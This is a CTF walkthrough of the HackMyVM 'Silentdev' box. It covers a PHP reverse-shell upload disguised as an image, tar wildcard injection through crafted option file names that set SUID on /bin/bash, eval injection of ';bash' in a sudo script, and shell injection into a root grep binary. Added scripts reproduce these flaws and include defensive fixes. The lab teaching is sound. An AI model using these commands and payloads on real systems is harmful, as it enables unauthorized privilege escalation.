
HackMyVM-Silentdev

560 words · 3 minutes
Tags: Hackmyvm, Linux
Author: HYH
A technical enthusiast focused on network security, penetration testing and CTF challenges, who enjoys documenting hands-on experience, sharing tools and techniques, and keeps learning and growing.

Nmap

[root@Hacking] /home/kali/silentdev  
❯ nmap 192.168.26.18 -A -p-                                                                      

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 4a:f7:09:40:45:df:25:cc:a4:f5:85:ac:63:c6:13:3e (ECDSA)
|_  256 58:be:2c:d0:40:af:d5:9c:2a:13:38:82:61:f6:8c:87 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Upload Image
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:3A:A8:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Opening the site in a browser shows an image upload page.

Feroxbuster

[root@Hacking] /home/kali/silentdev  
❯ feroxbuster -u 'http://192.168.26.18/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.26.18/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [txt, php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        1l        5w       29c http://192.168.26.18/upload.php
301      GET        9l       28w      316c http://192.168.26.18/uploads => http://192.168.26.18/uploads/
200      GET      361l     2489w   217155c http://192.168.26.18/uploads/cat.jpg
200      GET       70l      139w     1602c http://192.168.26.18/
200      GET     5824l    31652w  2215731c http://192.168.26.18/uploads/dog.jpeg
[####################] - 60s   661656/661656  0s      found:5       errors:0      
[####################] - 60s   661638/661638  11053/s http://192.168.26.18/ 
[####################] - 1s    661638/661638  926664/s http://192.168.26.18/uploads/ => Directory listing (add --scan-dir-listings to scan)     

Upload

For the upload, start from a real image (so the content looks like an image), set the Content-Type to the image type, and insert the PHP code into the file. The extension is not filtered, so the file can be uploaded under a .php name.

Requesting the uploaded file then gives a reverse shell.

Own developer

Upload pspy and watch the process list; it reveals a scheduled task.

At the same time, /opt/project is writable by www-data: the directory is group-writable for developers, and www-data is a member of that group.

www-data@silentdev:/opt$ ls -al
total 12
drwxr-xr-x  3 root      root       4096 Apr 19 11:08 .
drwxr-xr-x 18 root      root       4096 Apr 19 10:00 ..
drwxrwx---  2 developer developers 4096 Sep  5 08:31 project
www-data@silentdev:/opt$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1004(developers)

The exploitation point is therefore the wildcard after tar. The shell expands `*` before tar runs, so a file in the directory whose name looks like a tar option is passed to tar as an option, and `--checkpoint-action=exec=` makes tar execute a command.

# run inside /opt/project, the directory the job archives
echo 'chmod +s /bin/bash' > shell.sh
chmod +x shell.sh
# file names that tar will consume as options once * is expanded
echo '' > '--checkpoint=1'
echo '' > '--checkpoint-action=exec=sh shell.sh'

Wait for the task to run.

This yields developer's privileges (the job runs as developer); write an SSH public key into that user's authorized_keys and connect over SSH.
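As an added example (not part of the original writeup), the following reproduces the tar wildcard injection in a scratch directory so you can see it fire before waiting on the real cron job. It assumes the job pspy showed runs GNU tar over the writable directory with a shell wildcard, something like `cd /opt/project && tar czf /tmp/backup.tgz *`; the page does not show the exact command line. The payload here only writes a marker file; on the box it would add an SSH key for developer instead.

```shell
#!/bin/sh
# Added example, not from the original writeup: the tar wildcard injection
# reproduced locally. Assumption: the scheduled job runs GNU tar over the
# writable directory with a wildcard (exact command not shown on the page).

# Drop the three files into the directory the privileged job archives.
# Stand-in payload writes a marker file; on the box it would instead append
# an SSH key to ~developer/.ssh/authorized_keys (the job runs as developer).
plant_files() (                    # $1 = directory archived by the job
    cd "$1" || exit 1
    printf '%s\n' '#!/bin/sh' 'echo pwned > pwned.txt' > shell.sh
    chmod +x shell.sh
    # The shell expands * into one argv entry per file name, and GNU tar
    # accepts long options anywhere in argv, so these names become options.
    : > '--checkpoint=1'
    : > '--checkpoint-action=exec=sh shell.sh'
)

# What the scheduled job does: archive everything in the directory via *.
# tar's argv becomes: cf <archive> --checkpoint-action=exec=sh shell.sh --checkpoint=1 shell.sh
# and tar runs "sh shell.sh" (via /bin/sh -c, in its cwd) at the first checkpoint.
simulate_job() (                   # $1 = directory, $2 = archive path outside it
    cd "$1" || exit 1
    tar cf "$2" *
)

# Fix for defenders: end option parsing with -- and glob as ./* so a file named
# --checkpoint-action=... is archived as data instead of being parsed as an option.
safe_job() (                       # $1 = directory, $2 = archive path outside it
    cd "$1" || exit 1
    tar cf "$2" -- ./*
)
```

Running `plant_files /opt/project` on the target does the same thing as the four commands above; the `simulate_job`/`safe_job` pair is there to show locally that the marker appears only for the wildcard form.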

Own alfonso

Check sudo:

$ sudo -l
Matching Defaults entries for developer on silentdev:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User developer may run the following commands on silentdev:
    (alfonso) NOPASSWD: /usr/bin/sysinfo.sh
$ cat /usr/bin/sysinfo.sh
#!/bin/bash

echo "Hello $USER, checking system status."

echo "Choose an option:"
echo "1. Disk usage (df)"
echo "2. Running processes (ps)"
echo "3. Exit"

read -p "Enter option (1-3): " opt

case "$opt" in
        1) action="df" ;;
        2) action="ps" ;;
        3) echo "Goodbye!"; exit ;;
        *) action="echo Invalid option" ;;
esac

read -p "Any additional options?: " extra

eval "$action $extra"

The last lines contain the injection point: after the menu choice, a second prompt asks for extra options, and the answer is concatenated onto the command and passed to eval. So a command can be injected like this:

sudo -u alfonso /usr/bin/sysinfo.sh
Enter option (1-3): 1
Any additional options?: ;bash

Root

Check sudo:

alfonso@silentdev:~$ sudo -l
Matching Defaults entries for alfonso on silentdev:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User alfonso may run the following commands on silentdev:
    (ALL) NOPASSWD: /usr/bin/silentgets
    
alfonso@silentdev:~$ sudo /usr/bin/silentgets 
Enter the username: root
root:x:0:0:root:/root:/bin/bash

alfonso@silentdev:~$ file /usr/bin/silentgets 
/usr/bin/silentgets: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, BuildID[sha1]=faab9c84241c2cd5503077cc1bda8f05e0c81930, for GNU/Linux 3.2.0, with debug_info, not stripped

Copy the binary off the box and open it in IDA to read the decompiled code; it is statically linked with debug info and not stripped, so symbols are available.

It appears the input string is placed into a grep command against /etc/passwd. A crafted string that breaks out of the argument therefore gives command execution; the executed command ends up looking like this:

grep 'root' /etc/passwd;bash;cat /etc/passwd

where the username typed at the prompt is

'root' /etc/passwd;bash;cat
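As an added example (not part of the original writeup), the shell mock below reproduces what the decompiled `silentgets` appears to do, formatting the username unquoted into `grep <name> /etc/passwd` and handing the string to a shell, next to a lookup that calls grep directly with a validated name. The passwd file is a parameter so the demonstration can run on a constructed copy; the exact C code of the binary is not on the page, so the mock is an assumption about its behaviour, not its source.

```shell
#!/bin/sh
# Added example, not from the original writeup: a shell mock of the silentgets
# command construction ("grep %s /etc/passwd" run through a shell) and a
# hardened lookup. $2 is the passwd file so the demo works on a constructed copy.

# Vulnerable: the username is interpolated unquoted into a command string that
# a shell parses. The input from the writeup, 'root' /etc/passwd;bash;cat,
# turns one grep into three commands, the middle one being a shell.
silentgets_mock() {                # $1 = username, $2 = passwd file
    sh -c "grep $1 $2"
}

# Hardened: validate the name against the passwd username alphabet, then call
# grep directly with an anchored literal pattern; no shell ever sees the input.
# Returns 1 for a rejected name or a name that is not in the file.
safe_lookup() {                    # $1 = username, $2 = passwd file
    case "$1" in
        ''|*[!a-z0-9_-]*) echo "rejected: $1" >&2; return 1 ;;
    esac
    grep -- "^$1:" "$2" || return 1
}
```

With the constructed passwd file in the test, `silentgets_mock "'root' FILE;echo INJECTED;cat" FILE` prints the injected marker between the grep output and a full dump of the file, which is exactly the behaviour that yields a root shell when the real binary runs under `sudo`.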
